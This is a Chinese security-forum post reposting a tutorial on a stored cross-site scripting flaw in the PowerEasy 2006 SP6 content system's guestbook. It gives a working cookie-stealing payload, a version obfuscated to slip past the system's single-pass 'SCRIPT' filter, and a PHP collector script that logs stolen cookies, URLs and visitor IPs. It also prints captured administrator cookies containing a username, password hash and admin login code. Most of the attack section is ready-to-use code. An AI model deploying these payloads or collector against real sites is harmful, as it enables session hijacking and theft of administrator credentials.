服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-11-9 19:53:47

动易2006_SP6最新漏洞得到管理员密码

其实这个消息跨站很早我就测试过了,也成功,只是动易比较特须没能利用成功,此文还不错,转来学习学习。<BR>鬼仔注:从7j那里看到的,并且有7j写的接收页面。<BR><BR>7j:没有找到他说的接收页面,只有自已用PHP写个了<BR>&lt;?<BR>$filename = date("Ymd").".txt";<BR>$time = @date("Y年m月d号H点i分s秒",time());<BR>$cookie = $_POST['cookie'];<BR>$url = $_POST['url'];<BR>$hostname = $_POST['hostname'];<BR>if ($cookie &lt;&gt; ""){<BR>$tmp = fopen($filename,"a+");<BR>fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");<BR>fclose($tmp);<BR>}<BR>?&gt;<BR><BR>来源:′失眠ヤ夜 's blog<BR><BR>漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例<BR>下面我们来测试一下漏洞<BR>打开留言板,选择源代码模式签写留言<BR>审核发表状态下钓到管理员Cookies的几率比较到<BR>我们先来试试一些文字<BR>输入&lt;&gt;未被过滤<BR>输入&lt;script&gt;过滤成&lt;&gt;,不好意思 刚才弄错了<BR>输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)<BR>看 漏洞出来了<BR>也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机<BR>(iframe标签你可以自己测试)<BR>下面是一个获得Cookies的代码,会把Cookies提交到<A href="http://localhost/cookies/cookies.asp" target=_blank>http://localhost/cookies/cookies.asp</A>,相关的代码我会打包到教程里<BR>&lt;form name=redir action=http://localhost/cookies/cookie.asp method=post&gt;<BR>&lt;input type=hidden name=cookie&gt;<BR>&lt;input type=hidden name=url&gt;<BR>&lt;input type=hidden name=hostname&gt;<BR>&lt;/form&gt;<BR>&lt;script&gt;redir.cookie.value=documents&#46cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();&lt;/script&gt;<BR>现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤<BR>更改后的代码如下:<BR>&lt;FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp&gt;<BR>&lt;input type=hidSCRIPTden name=coSCRIPTokie&gt;<BR>&lt;input type=hidSCRIPTden name=uSCRIPTrl&gt;<BR>&lt;input type=hidSCRIPTden name=hoSCRIPTstname&gt;<BR>&lt;/forSCRIPTm&gt;<BR>&lt;scrSCRIPTipt&gt;rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();&lt;/scrSCRIPTipt&gt;<BR>现在我们发表留言<BR><BR>看 数据库里的代码是我们修改前的代码<BR>现在以管理员身份登录<BR>现在我们保存cookies的数据库是空的<BR>这是我发送的钓Cookies的网页<BR><BR>好的,现在代码已经执行,管理员的Cookies已经被我们钓到了<BR>我们来看一下<BR>ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&amp;UserName=admin&amp;AdminLoginCode=PowerEasy2006&amp;AdminName=admin&amp;UserPassword=469e80d32c0559f8&amp;RndPassword=4P263W7JiD425kyd&amp;AdminPassword=469e80d32c0559f8<BR>怎么样?得到了吧?<BR>里面有管理员的用户名、密码,和管理认证码<BR><BR>信息管理和短消息也可以如法炮制,具体方法我就不多说了<BR>在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下<BR>还有test.htm里的URL也要改一下,可以用它做测试 .

lxh0896 发表于 2006-6-7 06:15:39

re:动易2006_SP6最新漏洞得到管理员密码

<P>今天是一个特殊的日子</P>
<P>&nbsp;</P>
页: [1]
查看完整版本: 动易2006_SP6最新漏洞得到管理员密码